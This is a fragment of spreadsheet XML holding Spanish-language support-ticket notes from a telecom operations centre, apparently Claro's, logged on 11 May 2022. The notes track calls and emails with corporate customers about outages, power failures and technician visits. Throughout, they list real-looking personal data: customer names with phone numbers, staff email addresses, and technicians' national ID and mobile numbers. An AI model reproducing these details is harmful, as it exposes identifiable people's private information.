    <t>NOS ATIENDE MIRIAM COMENTA QUE ELLA SOLICITO UN TECNICO DESDE QUE REPORTO EL SERVICIO Y QUE NO NOS APOYARA CON REALIZAR PRUEBAS, YA QUE INDICA QUE ESE NO ES SU TRABAJO Y ADEMAS NO SABE DONDE ESTAN LOS EQUIPOS Y NO QUIERE REALIZAR ALGUNA ACCION QUE AFECTE EL SERVICIO, NOS INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS SOLO QUE EL TECNICO LLEGUEN LO MAS PRONTO POSIBLE, CLIENTE NOS IDNICA QUE ESTA A LA ESPERA DEL TECNICO Y NOS CUELGA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4560008</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIELA WUINACK 55542421  MENCIONA QUE PERSISTE EL INCONVENIENTE PERO YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA EN LA MAÑANA (NO BRINDA HORA ESPECIFICA)
-ID 1001870404</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIELA WUINACK AL 55542421 INDICA QUE AUN NO CUENTA CON SERVICIO QUE LE APARECE CONECTANDO || SE NOTIFICA A GESTOR **
ID 1001813481
**</t>
  </si>
  <si>
    <t>F4560010</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 17:52
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; JCHEGUEN@GANOITOUCH.COM &lt;JCHEGUEN@GANOITOUCH.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: 526700001T - GANO ITOUCH GUATEMALA S.A.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
526700001T - GANO ITOUCH GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4560018</t>
  </si>
  <si>
    <t>-* SE HABLA CON  CRISTIAN RODRIGUEZ (CLIENTE) SE LE INFORMA SOBRE EL PROCESO DE COORDINACION EN CURSO, COMENTA QUE ESTARÁ ATENTO Y NOTIFICARA AL PR PARA QUE APOYEN EN AGILIZAR -*
-*</t>
  </si>
  <si>
    <t>F4560022</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENATO LORENZANA 30246026 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE PERO SOLICITA LLAMADA EN 2 DIAS
-ID 1001774704</t>
  </si>
  <si>
    <t>F4560026</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANA DIAZ  AL 0050370518343 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001818393
**</t>
  </si>
  <si>
    <t>F4560027</t>
  </si>
  <si>
    <t>SE PROCEDE A LLAMAR AL AREA DE MONITOREO DE CAJEROS DONDE ME INDICA QUE NO SE TIENE RESPUESTA NI POR 3G NI POR PRINCIPAL.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 11:14
FIN: HOY, 11:19
DURACIÓN: 4:57
ID DE LLAMADA: 1001758576</t>
  </si>
  <si>
    <t>F4560034</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROLANDO MARADIUAGA  88524151 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001863364</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE QUIEN INDICA QUE SE LLAME EN 30 MINUTOS YA QUE SE ENCUENTRA DE CAMINO A SITIO-</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE ROLANDO MARADIUAGA  AL 88524151 SE BRINDA RETROALIMENTACION A CLIENTE **
ID 1001814171
**</t>
  </si>
  <si>
    <t>F4560035</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE FRANCISCO REYES, QUIEN ESTA UBICANDO EL EQUIPO.
1001874810
COLA:
NOMBRE: A: 0050378615430
NÚMERO: 0050378615430
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 0050378615430
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 17:01:26</t>
  </si>
  <si>
    <t>LCIENTE NOS COMENTA QUE PIDIO DE BAJA A 1 DE LOS E1: 22396400 PERO AHORA NO FUNCIONAN LOS DOS E1'S Y SOLOPIDIO BAJA DE 1- EN ESTE MOMENTO SE SIGUE EN LINEA- CLIENTE UBICA EQUIPOS- ##</t>
  </si>
  <si>
    <t>SE LLAMA ACLIETE FRANCISCO REYES-78615430 2 VECES ##EVIA A BUZON ##SE INTENTARA NUEVAMETE EN BREVE##
1001770969
COLA:
NOMBRE: A: 0050378615430
NÚMERO: 0050378615430
DURACIÓN: 0:00:26
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378615430
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 11/05/2022 11:47:08
1001771349
COLA:
NOMBRE: A: 0050378615430
NÚMERO: 0050378615430
DURACIÓN: 0:00:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378615430
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 11/05/2022 11:47:12</t>
  </si>
  <si>
    <t>SE LLAMA ACLIETE FRANCISCO REYES-78615430
1001770969
COLA:
NOMBRE: A: 0050378615430
NÚMERO: 0050378615430
DURACIÓN: 0:00:14
ESTADO: MARCANDO
DETALLES: 0050378615430
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 11/05/2022 11:45:42</t>
  </si>
  <si>
    <t>SE TIENE A CLIETE EN LINEA FRANCISCO REYES-78615430 ##
1001793894
COLA:
NOMBRE: A: 0050378615430
NÚMERO: 0050378615430
DURACIÓN: 0:00:33
ESTADO: CONECTADA
DETALLES: 0050378615430
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 11/05/2022 12:47:54</t>
  </si>
  <si>
    <t>F4560050</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SRTA. DAYANA SOTO 79433662 UBICA LOS  EQUIPO EL ETX-1 ESTA ENCENDIDO, APLICARA REINICIO Y OBSERVA HAY UN PATCHCORD DESCONECTADO, ENVIARA FOTOS DE LOS EQUIPOS Y CONEXIONES, ADICIONAL SE ESCUCHA ALARMA DE ENERGIA DE UPS. ID: 1001832782.</t>
  </si>
  <si>
    <t>CLIENTE ENVIO EVIDENCIA, EL ETX-1 ESTA ENCENDIDO, APLICO REINICIO VALIDO LAS CONEXIONES PERO ENLACE CONTINUA DOWN, ESTIMADOS CC GENERAR NUEVO TICKET PARA ENVIAR VISITA TECNICA, GRACIAS.
ETX-1
PWR ROJO
NET1: APAGADO
USER 4: ENCENDIDO</t>
  </si>
  <si>
    <t>F4560051</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA AL 53177405 INDICA QUE SI CUENTAN CON ENERGIA || SE TRATA DE CONTACTAR A GESTOR PERO NO SE OBTIENE RESPUESTA || SE NOTIFICA PARA EL SEGUIMIENTO***
ID 1001819792
**</t>
  </si>
  <si>
    <t>F4560059</t>
  </si>
  <si>
    <t>-* ANGEL RODRIGUEZ (CLIENTE) INFORMA QUE AUN ESTAN REALIZANDO PRUEBAS, SOLICITA SE MANTENGA EN MONITOREO PARA LAS 18:00 HRS -*
-*</t>
  </si>
  <si>
    <t>F4560060</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELMER DUVÁN CARDONA 40422160 MENCIONA QUE NO HAY ENERGIA ELECTRICA EN PR
-ID 1001833746</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE ELMER DUVÁN CARDONA PALACIOS AL 40422160 NO RESPONDE, SE INTENTARA
 LUEGO **
ID 1001821873
**</t>
  </si>
  <si>
    <t>F4560063</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN MISAEL  58064113 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001887791</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN MISAEL  58064113 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001832595</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN MISAEL  AL 58064113 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001852213
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN MISAEL  AL 5806 4113 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001822447
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN MISAEL  AL 58064113 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001871402
**</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR EDWIN MISAEL AILÓN LÓPEZ 58064113 ID: 1001898968 INDICA QUE NO HAY ENERGÍA, SE NOTIFICA A GESTOR ALEJANDRO.NAVARRO POR SKYPE PARA QUE PROCEDA AL CIERRE DE LA F4560063*/*/*/*SE CAMBIA DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>F4560069</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYNOR VASQUEZ 30647212 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001772763</t>
  </si>
  <si>
    <t>F4560071</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002473576OC::: TICKET CNOC IMBBL003843::: "FUERA DE SERVICIO "</t>
  </si>
  <si>
    <t>F4560075</t>
  </si>
  <si>
    <t>SE LLAMA A  CLIENTE ELMER DUVÁN PALACIOS    40422160, INDICA QUE EN EL AREA NO HAY ENERGIA ELECTRICA Y AUTORIZA CIERRE DE TICKET
1001802260
COLA:
NOMBRE: A: 40422160
NÚMERO: 40422160
DURACIÓN: 0:01:37
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 40422160
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 11/05/2022 13:12:30</t>
  </si>
  <si>
    <t>F4560086</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 17:59
PARA: WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; CARLOS LUIS VENTURA PINEDA &lt;CARLOS.VENTURA@FICOHSA.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;
CC: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; CENTRO DE MONITOREO &lt;HNB-NOC@FICOHSA.COM&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; EVELIN MELISA MEJIA GARCIA &lt;EVELINM.MEJIA@CLARO.COM.GT&gt;
ASUNTO: RE: INESTABILIDAD DATOS AGNS ZONA NORTE
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4560090</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE ELMER DUVÁN CARDONA PALACIOS 40422160 ||NO RESPONDE SE INTENTARA LUEGO **
ID 1001823859
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELMER DUVÁN CARDONA 40422160 MENCIONA QUE AUN NO HA REGRESADO LA ENERGIA ELECTRICA
-ID 1001831676</t>
  </si>
  <si>
    <t>F4560097</t>
  </si>
  <si>
    <t>CLIENTE VICTOR GARCÍA 30752383 REINICIA SU PLANTA PBX, SE OBSERVA QUE E1 DEJA DE ALARMARSE, CLIENTE REALIZA PRUEBAS Y LOGRA SACAR UNA LLAMADA, LUEGO EL E1 MUESTRA EL MENSAJE DE DAÑO EN LA LINEA NUEVAMENTE. SE LE INDICA AL CLIENTE QUE REVISE SU PLANTA PERO INCISTE EN QUE SE CERTIFIQUE EL E1. SE PROCEDE A ABRIR WO. ID: 1001807090</t>
  </si>
  <si>
    <t>F4560107</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA SIN PROBLEMA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4560108</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PARA PEDIR CONTACTO DE PR 24119191 EXT 10582 ATIENDE; ABEL, ID: 1001786312, BRINDA JESICA LOPEZ 42373696 SE LE LLAMA ID: 1001790055 / COMENTA QUE NO HAY ENERGIA EBN EL SITIO, SE NOTIFICA A YENSI.CALGUA VIA SKYPE PARA EL CIERRE | WIP</t>
  </si>
  <si>
    <t>F4560118</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MOISES ULARTE 54001808 CONFIRMA QUE EL SERVICIO YA ESTA ACTIVO CON LLAMADAS EN AMBOS SENTIDOS, SE PROCEDE AL CIERRE DEL TICKET
1001807879
COLA:
NOMBRE: A: 54001808
NÚMERO: 54001808
ESTADO: CONECTADA
DURACIÓN: 0:00:37
DETALLES: 54001808
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 11/05/2022 13:28:21</t>
  </si>
  <si>
    <t>F4560121</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JULIO BENEDICTO PEREZ 36571015 CLIENTE SOLICITA QUE SE LE LLAME EN 20 MIN PARA CONFIRMAR YA QUE ESTAN VERIFICANDO**
ID 1001792574
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JULIO BENEDICTO PEREZ AL 36571015 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001802190
**</t>
  </si>
  <si>
    <t>F4560125</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTUARDO SAQUICK AL 23610909 EXT. 4368 CONFIRMA SERVICIO ESTABLE Y OPERATIVO. AUTORIZA CIERRE DEL TICKET **
ID 1001853236
**</t>
  </si>
  <si>
    <t>F4560137</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE JOSUE CANIZ 41673388, CLIENTE INDICA QUE EL EQUIPO CISCO SE REINICIA CONSTANTEMENTE, CLIENTE INDICA QUE EL PERSONAL NO CONOCE DE EQUIPOS PARA APOYAR EN HACER PRUEBAS Y EL NO SE ENCUENTRA EN LAS INSTALACIONES. CLIENTE INDICA QUE HOY NO HAY NADIE EN EL SITIO, POR LO QUE SOLICITA SE PUEDA COORDINAR UNA VISITA PARA EL DÍA DE MAÑANA A LAS 8 AM. INDICA QUE DEJARÁ INDICADO QUE LLEGARÁN EL DÍA DE MAÑANA. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4560138</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ROCAEL OROZCO 41994729 PERO ENVÍA A BUZÓN, SE INTENTARA EN UNOS INTENTES
1001810462
1001810779
1001810814</t>
  </si>
  <si>
    <t>SE LLAMA AC LIENTE ROCAEL OROZCO 41994729 VALIDA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN GDN 22008585 SEÑORITA DE RECPCION NOS VALIDA SERVICIO- ##NOS COMENTA QUE YA TIENE LLAMADAS ENTRANTES  Y SALIENTES ##NOS MANTIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>F4560157</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVONNE DE LEON 30532043 MENCIONA QUE EL INCONVENIENTE ES CON EL WIFI, ESTA RECONOCIENDO OTRA RED Y NO LA DE CLARO, SE NOTIFICARA A GGESTOR PARA SEGUIMIENTO
-ID 1001827223</t>
  </si>
  <si>
    <t>F4560179</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. RAFAEL MONTERROSO  42174563 INFORMA QUE DESDE LAS 10 AM OBSERVARON DESCONEXIONES, ACTUALMENTE LO VE OPERATIVO, REALIZARA PRUEBAS SOLICITA DEJAR INCIDENTE EN MONITOREO HASTA MAÑANA A LAS 10 AM.
SE ENVIA CORREO
ASUNTO: ENLACE OPERATIVO 42700481 || BANCO DE LOS TRABAJADORES</t>
  </si>
  <si>
    <t>F4560196</t>
  </si>
  <si>
    <t>SE COLOCA EN CONFERENCIA AL TEC. Y AL CLIENTE CARLOS MADRID QUIEN INDICA QUE SE PUEDE DAR SEGUIMIENTO EL DIA DE MAÑANA A PARTIR DE LAS 8:30AM
1001877965
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4895
DURACIÓN: 0:00:02
ESTADO: CONECTADA
DETALLES: 4895
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 17:13:32</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MADRID 31472163 MENCIONA QUE NO TIENEN LLAMADAS SALIENTES NI ENTRANTES, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001835534</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE ENN LINEA- SE ESTA DIRIGIENDO AL EQUIPO--- ##VIVO</t>
  </si>
  <si>
    <t>F4560216</t>
  </si>
  <si>
    <t>SE ENVIA CORREO, SOLICITANDO ACCESOS A PERSONAL DE CNOC INTERNACIONAL.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 15:17PARA: HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;ASUNTO: 944524OH || IMCRL004735 || CARGILL DE HONDURAS
BUENAS TARDES ESTIMADO CLIENTE,
DANDO SEGUIMIENTO AL ENLACE REPORTADO DE CLIENTE CARGILL DE HONDURAS SRL - ID 944524 - IMCRL004735 SE SOLICITA GESTIONAR PERMISOS DE ACCESO PARA EL PERSONAL TÉCNICO ASIGNADO, FAVOR INDICARNOS EL DÍA Y LA HORA A LA QUE SE PODRÁ ACCEDER A SUS INSTALACIONES PARA PODER PROCEDER CON LA REVISIÓN Y REPARACIÓN DEL ENLACE. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
DAVID AGUILAR AMADOR
ID 0801-1991-17499
CEL:  3237-5778
JUAN CARLOS AGUILAR
ID 0801-1988-16853
CEL: 3190-7613
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE SOLICITANDO CONTACTO DE PERSONAL EN PUNTO REMOTO PARA DESCARTAR PRUEBAS DE PRIMER NIVEL
RE: SOLICITUD DE SOPORTE ::: ID LOCAL 944524::: TICKET CNOC IMCRL004735::: "FUERA DE SERVICIO "
¿
MICROSOFT OUTLOOK
MIÉ 11/05/2022 13:46
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: RAFAEL.CASTILLO@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. TRATA DE VOLVER A ENVIAR ESTE MENSAJE MÁS TARDE O PONTE EN CONTACTO CON EL DESTINATARIO
JURGEN RENE BOCH CAAL
MIÉ 11/05/2022 13:46
BUENAS TARDES,
ESTIMADO CLIENTE, OBSERVAMOS QUE A NIVEL LÓGICO NO HAY INCONVENIENTES, ES NECESARIO REALIZAR PRUEBAS DE PRIMER NIVEL CON PERSONAL EN SITIO Y QUE NOS CONFIRMEN QUE HAYA ENERGÍA COMERCIAL EN LA ZONA, PODRÍA BRINDARNOS EL NUMERO DE ALGÚN CONTACTO DE SITIO, O BRINDARNOS FOTOGRAFÍA DEL ESTADO DE LOS EQUIPOS POR FAVOR. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.
JUERGEN BOCH
GESTOR DE CLIENTES CORPORATIVOS N1
NOC CLARO DE CENTROAMÉRICA
JURGEN.BOCH@CLARO.COM.GT
(502)2420-6231
AVENIDA LA CASTELLANA 38-40 ZONA 8, TORRE CLARO.
CIUDAD DE GUATEMALA.</t>
  </si>
  <si>
    <t>F4560218</t>
  </si>
  <si>
    <t>-*  WILKER ROSALES 41171586 (CLIENTE) INFORMA QUE AUN VEN CAIDO EL SERVICIO, SE INDAGA Y COMENTA QUE LA IP AFECTADA ES 190.149.69.89, SE VALIDA QUE NO ES LA IP DE ESTE SERVICIO, POR LO QUE SE INGRESA TICKET F4560328 // SD1124842 PARA EL ID 443900012T, CLIENTE ENTERADO AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4560219</t>
  </si>
  <si>
    <t>CLIENTE LLAMO A CC, SE DA SEGUIMIENTO CON SD1124863 PARA LA REVISION DE LA IP2107001.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DANILO AMAYA 78423989 INFORMA QUE NO TIENE COMUNICACION HACIA OTRO PUNTO ...</t>
  </si>
  <si>
    <t>F4560222</t>
  </si>
  <si>
    <t>VISITA PARA MAÑANA 8 AM COORDINADO
SE RECIBE LLAMADA DE CLIENTE RENATO LORENZANA QUIEN COMENTA QUE NO ES NECESARIO GESTIONAR ACCESOS || SE CONVERSA CON TECNICO ASIGNADO DIAZ ALDANA WILLIAM EDGARDO 58260597
1001878859
COLA:
NOMBRE: DE: ERITO FERNANDO TECU XITUMUL
NÚMERO: 6078
DURACIÓN: 0:05:08
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 6078
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 11/05/2022 17:22:26
1001880615
COLA:
NOMBRE: A: 58260597
NÚMERO: 58260597
DURACIÓN: 0:04:20
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58260597
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 11/05/2022 17:28:05</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO, //  QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 15:40
PARA: SOPORTE@INNOVATELCO.NET &lt;SOPORTE@INNOVATELCO.NET&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 863400123T | | SD1124809 | INNOVA OUTSOURSING, S.A.
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO , EL DÍA DE MAÑANA A PRIMERA HORA.
DIRECCIÓN:  BARRIO EL CENTRO LA UNIÓN ZACAPA
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
 DIAZ ALDANA WILLIAM EDGARDO	559550	2703302911501
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4560232</t>
  </si>
  <si>
    <t>**SE LE LLAMA CLIENTE ERICK MENDEZ 36621815 INDICA QUE POR RATOS LE DA UN MENSAJE  QUE NO TIENE INTERNET DESEA TENERLO EN OBSERVACION LO QUE QUEDA DEL DIA Y SOLICITA QUE SE LE DE SEGUIMIENTO MAÑANA Y SE VE QUE SIGUE IGUAL SOLICITA QUE SE LE PROGRAME UNA VISITA PARA IR A VERIFICAR EL ROUTER || SE NOTIFICA A GESTOR**
ID 1001875410
**</t>
  </si>
  <si>
    <t>F4560233</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DORCAS GUARCHAJ 48654090 MENCIONA QUE ESTA TENIENDO PROBLEMA CON PERDIDA DE AUDIO, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001853617 - 1001853787</t>
  </si>
  <si>
    <t>F4560254</t>
  </si>
  <si>
    <t>SE NLLAMA A CLIENTE WILLIAM RALDA 40028530 MENCIONA QUE YA RESTABLECIO EL SERVICIO PERO ESTA LENTO, SE LE NOTIFICA QUE EL SERVICIO ESTA SATURADO, CLIENTE INDICA QUE VALIDARAN A NIVEL INTERNO
-ID 1001874114</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MILTON BAMACA 59455358 QUIEN APLICA REINICIO A LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE, SE NOTIFICARA A AGESTOR PARA EL SEGUIMIENTO
-ID 1001848631</t>
  </si>
  <si>
    <t>F4560296</t>
  </si>
  <si>
    <t>*/*/*/*/CLIENTE RODRIGO DE CENTRAL SOLICITA APERTURA DE TT POR CAIDA TOTAL, SE VALIDA QUE YA SE TIENE TT CON ESE ID POR INTERMITENCIA, SE LE CONSULTA SI ES INTERMITENCIA O CAÍDA TOTAL PERO INDICA QUE SE LES CAYÓ Y LUEGO VOLVIÓ UN RATO Y YA SE VOLVIÓ A CAER, SE VERIFICA EN LA SD1124834/F4560296 YA SE ESTA DANDO SEGUIMIENTO Y QUE SEGÚN CRONOLOGIA DEL 11/05/2022 16:44:30 CLIENTE DEL PR CONFIRMO QUE NO TIENEN SERVICIO, SE NOTIFICA A GESTOR ALEJANDRO.NAVARRO POR SKYPE PARA QUE CONTINÚE SEGUIMIENTO Y SE CAMBIA DE ESTADO*/*/*/*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE TAROT AL 55194520 CLIENTE INDICA QUE AUN VE CAIDO EL SERVICIO DE RENACE1 , QUIERE SABER SI DE PARTE NUESTRA SE LLEGA AL EQUIPO CTC || SE NOTIFICA A GESTOR INDICA QUE ESTARA VERIFICANDO **
ID 1001866132
**</t>
  </si>
  <si>
    <t>F4560315</t>
  </si>
  <si>
    <t>SE RESPONDE A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 17:52PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-749144##] : ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM1172"
GRACIAS POR LA INFORMACIÓN, QUEDAMOS ATENTOS, A LA VERIFICACIÓN DEL SUPERVISIÓN.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 14:57PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM117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0315
ID: 47501765T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1172
UBICADO EN:  ATM1172 FARMACIA GALENO, 4 CALLE 1-25 ZONA 4 CUILAPA SANTA ROSA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4560316</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO
